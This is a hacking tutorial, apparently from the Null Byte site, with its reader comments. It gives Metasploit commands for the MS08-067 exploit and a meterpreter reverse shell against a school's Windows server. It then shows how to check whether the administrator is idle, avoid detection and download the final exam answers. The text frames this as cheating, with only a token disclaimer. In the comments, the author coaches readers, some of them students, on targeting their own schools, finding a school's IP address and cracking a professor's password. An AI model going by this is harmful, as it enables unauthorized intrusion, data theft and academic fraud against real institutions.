Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

How to Hack Your School's Server to Download Final Exam Answers

Hack Like a Pro: How to Hack Your School's Server to Download Final Exam Answers

Welcome back, my fledgling hackers!

If you're like most aspiring hackers, at one time or another you've probably spent too much time playing Call of Duty and not enough time preparing for your final exams.

So for today, we'll look at how to break into your school's server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!

This hack uses Metasploit along with its meterpreter, so let's get after those finals and fire up our Metasploit in BackTrack!

WARNING (Disclaimer):

Of course, this is for demonstration/entertainment purposes only. Please do not break into your school's server and steal exams as it's illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.

Step 1: Find That Proper Exploit

Those of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.

In our case here, our school is running a Windows 2003 Server that stores all the department's exams and records. So, let's use the /exploit/windows/smb/ms08_067_netapi. To find it, type:

  • msf > search ms08

Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:

  • msf > use /exploit/windows/smb/ms08_067_netapi

Step 2: Set the Payload

Now we need to set our payload. In this case, we'll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.

  • msf > set payload /windows/meterpreter/reverse_tcp

Let's take a look next at the options that we need for this exploit/payload combination by typing:

  • msf > show options

Step 3: Set the Options

Now we can see that we need to set the RHOST and the LHOST.

  • msf >set LHOST 192.168.1.114
  • msf >set RHOST192.168.1.108

Step 4: Exploit That Server!

Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.

  • msf > exploit

Step 5: Check to See if the Admin Is Using the System

We should now have a meterpreter shell on the school's server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.

  • meterpreter >idletime

As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let's wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!

Once we're safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let's type lpwd (both pwd and lpwd will work).

Meterpreter responds with the / symbol indicating that we're in the root directory.

Step 6: Find the Final Exams

We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That's probably where the exams are! Let's change directories to Concord University:

  • meterpreter c:\\ConcordUniversity

Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.

Now we're in ConcordUniversity, we can get a directory listing by typing:

  • meterprter > ls

We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we're looking for the Biology final, let's navigate to the Biology directory.

  • meterpreter > cd biology

Voilà! There's the final exam for our biology class.

Step 7: Download the Final

Meterpreter has a built-in download feature, so all we need to do is type:

  • meterpreter > download C:\\biology\exams\FinalExam

We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.

When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!

Now we are guaranteed a 95% (don't get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to the Null Byte forum if you have questions on hacking topics unrelated to this article.

Failed exam and Multiple choice photo via Shutterstock

92 Comments

in the rhost and lhost .. shud i put my target ip?
if no then where to put my target's ip?

Padmes:

The RHOST is remote host, the target. LHOST is the local host, you.

OTW

Does not. Believe it not. Did not have real world (vm not). :-((
plz help me.

I mean, the Internet is the real world.

Holmz:

I'm not sure I understand your question or comment. Would you please re-state it for me in complete sentences? What "Does not" mean?

OTW

Hello pls I need your help is there anyway we can get in contact

hi , sorry, when i said "dose not" i mean that is not happening
farshad.south: i do everything but cant make open session , every of them are unsuccess
farshad.south: i dont know why ?!
farshad.south: if i give you an ip , will you check that for me and thell me it will work on that or not ?
farshad.south: thanks

hi , sorry, when i said "dose not" i mean that is not happening
i do everything but cant make open session , every of them are unsuccess
i dont know why ?!
if i give you an ip , will you check that for me and thell me it will work on that or not ?
thanks
:-))

Holmz:

What is the operating system of your target?

OTW

My server use proxy 8080, i'm try to find host ip but i have a lot of ip, i don't what is real host ?

Thanks OTW,

by the way, i realised your Lhost is always 192.168.1.something, that means u are always in his network when u hack into his database ? what if u are trying to enter from another network for exam across countries ?

actually maybe i just don't understand ip address well enough. Hope you can clarify ! Thanks OTW and keep posting ! Loves your article.

In my posts here, I always am demonstrating on computers in my hacking lab. They are all on the same internal network, so they always have those private IP addresses.

If I was to attack a server on the outside, I would use their IP address which would not have a private, but rather a public, routeable IP. You will need to first obtain the public IP of the server and use that.

Hope that answers your questions.

OTW

Hey can you tell how to hack after knowing the school ip ?

If you were actually in anonymous you wouldn't be asking how to hack a school computer.

Anonymous:

Welcome to Null Byte! Glad you found us!

Getting the IP address is simple. Just ping the school's domain where they host their website.

ping www.schoolswebsite.com

It will return pings and the IP address.

OTW

When I do this exploit, metasploit binds to localhost successfully, and sends the exploit, but then nothing happens. It returns msf exploit(exploitname). Does that mean the exploit does'nt work?

Andrew:

It might. When you say it "binds to localhost" successfully, what do you mean? Does it come back and say "binding to localhost"? Are you giving your IP address or "localhost"/127.0.0.1?

OTW

yes, it does say "binding to localhost, I gave it my ip address witch i verified with ifconfig.

What IP address did you give it?

192.168.10.103

My os is kali the target's is windows xp

Hmmm...should work. What ports are open?

The target must have port 445 open.

ports 135, 139 and others. Stumped me to. Should i try the sessions -i 1 command? or should meterpreter automaticly pop up?

Yes,try sessions -l. Meterpreter doesn't always pop up.

OTW, can you shed any light on the online learning system called BlackBoard? Specifically, unmasking online test answers (radio buttons). It is quite secure, but I've learned that some of the most secure sites leave the most obvious vulnerabilities open for exploration...unfortunately I have yet to find any. Their web server has been masked and they are using a Cisco OS (???)

Gametime:

I've never tried hacking Blackboard, but like any piece of software, it has vulnerabilities.

The Cisco OS you are seeing is either a switch or router. That is not the OS of the server.

I doubt that anyone has spent a lot of effort trying to hack it because there are no rewards for doing so.

OTW

OTW:

When you say "there are no rewards for doing so" I have to respectively disagree. Rewards are subjective to the one receiving said reward.

To a student, the rewards for unmasking the inner workings of the system used to test his or her "knowledge" (or regurgitation from short-term memory) are limitless.

To others, the reward may not be as "rewarding" as it is for the student, but doesn't the majority of the "reward" of hacking come from the challenge itself?

Gametime:

I agree with you, but remember, I'm talking about the hacking community which is driven by money. There is very little money to be gained by hacking Blackboard, so few are spending their time trying to find its vulnerabilities and develop exploits.

OTW

OTW:

Well, there is a first time for everything so if you're ever feel the urge to "explore" just let me know.

-Gametime

Ok, I'll keep that in mind, but my agenda is very full at the moment.

Thanks alot oocupytheweb i like all your posts its amazing

one more question

after knowing the school ip can i hack it from any public library or cafe or and other place or i have to be in the local network of school ?

Anonymous;

Thanks for your kind words.

You can hack from anywhere. In my tutorials, I use my hacking lab with internal IPs, but they will work from any IP.

OTW

OTW

How to hack a windows server 2008 SP1-SP2 ?

Hi, great tutorial! Just two quick questions:
1) How do I find out what server my school is running on (you said yours was windows 2003 server)
2) is the "ms 08" command only for the win 2003?

Jojo:

As for the operating system on you school, check out my recon tutorials particularly the one on xprobe2.

The ms08_067 exploit will work most Windows operating systems up to the original Windows Server 2008. Microsoft has patched this vulnerability, though, on most systems.

Yes, I am using the free, community version of Metasploit.

Hope this helps.

OTW

oh one more thing! Your version of metasploit - is it the free community one everyone can download or the one you have to pay for ?

Hey OTW, something mad weird is going on with my school.

So day one I tried this, it all seemed to work and then when it got to the "exploit" command, it started and said something like "connection timed out" I had a gut feeling this was due to the wrong RHOST address. Anyways you said to find RHOST ping the school site so I did, and it won't return anything even though the site is up. I googled web address to IP to find the IP that way, and that's the IP i used as RHOST. I also tried xprobing2 it to scan for OS running, that wouldn't work either. I then logged onto a school pc (i just realized it was wired maybe that's why) and did ipconfig in CMD to find the default gateway, tried pinging that, and again nothing in return.

Why can't I xprobe, exploit, or even ping the site? :(
-Jojo

Jojo:

I'm not surprised. First, many network admin's disable a ping response on their network for just this reason. Try using hping or nmap. Look for my tutorials here in Null Byte. You can use TCP or UDP to ping with these tools which can't be blocked by the firewall or router and still have connectivity.

Also, you are probably correct regarding why the exploit timed out. You are probably using the wrong IP address. Just one last thing. Make certain you are using the public IP address of the web server.

OTW

OTW,

Do you know if official examinations like GCSEs (in the UK) are all already online for administrators to see?
And then if perhaps the administrators would have access to the answers as well online?
If so, do you think the answers will be made available to anybody online before the examinations are over?
Thank you in advance sir!

Martin.

Nemesis:

I'm sorry I can't really answer that question about your exams. The important point I was trying to make in this article is that you can get whatever is on the server with Metasploit. If the answers are there, I'm sure you can get them.

OTW

Barrack:

If you mean, will this attack work with a Mac as the victim, the answer is "no". Exploits are very specific to the OS, the services, the ports, etc. You could do this with another exploit on a Mac, though.

OTW

my man, a Bells for u, love how elaborate your explanations are, im a nub and think i will learn a lot from your posts, enlightening indeed..... (y)

OTW
Teach me the ways of hacking my Teacher
Im still 9th grade so bare with me

I want to tap in my schools website is there a way? ()

Ardan:

Welcome to Null Byte!

Just follow my tutorials and I'm sure you will be in to your schools website shortly.

OTW

Shubham:

Are you asking me whether you can hack into a game server? Of course!

OTW

Thanks for thee info I used it for other purposes though so not too illegal

what is the prospect of doing it using blackboard?

Wok:

Maybe, but this is a server hack and blackboard is an application.

OTW

Sir OTW, Thank you a LOT for you Excellent posts, but i still have some Questions:
1:should i set the LHOST to my private IP address?
2:when i try to exploit the webserver, it gives the following Error:

* Started reverse handler on 192.168.1.5:4444
* Automatically detecting the target...
* Fingerprint: Windows Server 2008 R2 Enterprise 7601 - Service Pack 1 - lang:Unknown
* We could not detect the language pack, defaulting to English

  • Exploit failed no-target: No matching target

Hi Matt:

Exploits are very specific to the operating system, ports, services, language and applications. This one is for XP and Server 2003. That's why it won't work.

OTW

Thanks a lot for the response.

But, is there an other exploit (just like this one) for win7?

with regards

Matt Buller

Matt:

I have several Windows 7 tutorials on here and another coming out today or tomorrow exploiting Adobe Flash Player on Windows 7/8.

OTW

bro plz share ur email id I want ask some question about ur hacking post

Please ask all your questions here.

Good day would you be able to assist me? I would like to know how to hack a university marks server. A South African university. UWC to be specific. Alternatively would you be able to put me into contact with Cape Town based hackers who don't charge too much for their services?

Hi.
After i put "exploit" in msfconsole, i have this :

  • Exploit failed unreachable: Rex::ConnectionTimeout The connection timed out.

The server is iis 6.0, 2003, like the one in your exemple.

Yes, totally.
Test :
(4 packets transmitted, 4 received, 0% packet loss, time 3004ms)

When i ping the site (thesite.com), in the Terminal, i can see : 64 bytes from site.thesite.com (the ip)... When i type this ip and this site in my browser, i'm not authorized (403). But just thesite.com works...

Idk if you understand

But i know another IIS 6.0 site that might be exploitable.
But i found that on the 2 sites, sometimes, there is no answer from my pings.

Idk if it's why i have this error (no pings answer), but how can i solve this bug ? Thanks a lot.

Often, the router will drop pings.

The RPORT is 445, but 445 is not enabled on the target.
Can i do something or it's game over ?

Tony:

This exploit takes advantage of port 445. If its not open, you will need to try another exploit.

It's seldom that someone closes port 445. How do you know isn't open?

OTW

It's just a local exploit...

How to I get my professor password for the final exam

Check out my tutorials here on cracking passwords. There are many different ways.

What should i do !!
Pinging site.com xxx.xxx.xxx.xxx with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for xxx.xxx.xxx.xxx:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

The exploit doesn't work, because the host is unreashable. I set my RHOST. What I do now?

--

Is there a way I can completely "open" some ports, if i have full access to the router/A.P. but not the server's firewall?

--

I'm not sure I understand your question. Do you mean, can you open the ports on the remote server's firewall? If so, the answer is yes, but you will access to the firewall's admin panel.

It's much easier to avoid the firewall. Every firewall has some ports open (80,443, 53, etc). There multiple techniques for sending your traffic through those open ports.

--
Thank you OTW,

Actually I don't have access to the server's firewall, but cracked the A.P. pass (and the default authentication works too) so, I was thinking of opening ports by forwarding them, but no success.

It only has two open ports 80 and 8080 (Apache server), I recently scanned it and now it has another open port i.e. 21 FTP, which is vulnerable, I will try to exploit it today.

Thank You again
--

Everything lost after the step where we have to put LHOST and RHOST
>The type of URL my institution use is 124.124.78.5:8084
>I had set LHOST to my IP ADDRESS from IPCONFIG
>it always says EXPLOIT FAILED , REFUSED BY REMOTE SERVER
>whenever i ping the address it only pings back
>i installed KALI LINUX on PARALLEL DESKTOP 10 on MAC
....> And launched METASPLOIT FRAMEWORKS
Please Help ME Further

Sunny:

Have you done your recon on your target? What is the server's operating system? What ports are open? What applications are running?

OTW

my school is using uniserver, windows 7.
is there a way to hack the server?

OTW, How did you access the RHOST IP? Thats the part i cannot gifure out how to get :/

Btw, thank you for your awesome tutorials, have been going through alot of them :).

Hi i am using the latest version of kali and when i try to set the payload this nortification pops up : The value specified for payload is not valid

is there a way to do this with windows 7

what if the server am trying to exploit is a linux operating system, like ubuntu for example, how do i get the exert exploit to use

Can anyone tell me which exploit I need to exploit an Windows Server 2012 R2?

is this hack used via LAN connect or Wireless connection?

please say that,please

but what if they are using a apache server and not a microsoft 2003 server?

My school website is running on Linux (Apache server)

hi, i can't install the metasploit. i already tried my best to close all the firewall and antivirus program. can somebody help?

Share Your Thoughts

  • Hot
  • Latest